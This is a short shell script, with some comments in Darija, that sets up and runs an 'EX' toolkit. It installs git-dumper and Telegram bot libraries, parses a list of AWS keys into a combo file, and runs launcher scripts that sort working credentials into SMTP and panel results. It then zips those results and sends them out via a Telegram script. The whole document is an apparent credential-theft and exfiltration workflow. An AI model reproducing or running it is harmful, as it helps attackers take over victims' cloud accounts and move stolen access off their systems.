# Upload EX.zip in /root

sudo apt-get update && sudo apt-get install python3-pip golang -y

sudo pip3 install git-dumper
wget https://github.com/arthaud/git-dumper/blob/master/requirements.txt
sudo apt-get install unzip

sudo pip3 install telebot
sudo pip3 install python-telegram-bot
sudo apt-get install zip

cd /root
unzip EX.zip

# Upload Aws.txt to /root/EX/scan_aws/parser
# copier hd stota li ntahet w 3mlom f file script.sh mn ba3d 3ml bash script.sh

#!/bin/bash
cd /root/EX/scan_aws

sudo apt-get install jq

sudo apt-get install awscli

cd /root/EX/scan_aws/parser
bash parser.sh Aws.txt

cd /root/EX/scan_aws/parser
zip Comboaws.zip comboaws.txt

cd /root/EX/scan_aws/parser
cp comboaws.txt /root/EX/scan_aws

cd /root/EX/scan_aws
echo 2 | python3 launch.py comboaws.txt

cd /root/EX/scan_aws
echo 1 | python3 launch.py comboaws.txt

cd /root/EX/scan_aws
zip AwsResult.zip smtp panel comboaws.txt

cd /root/EX/scan_aws
python3 sendAws.py

Echo "Done : Check Your Telegram, goodluck !!"
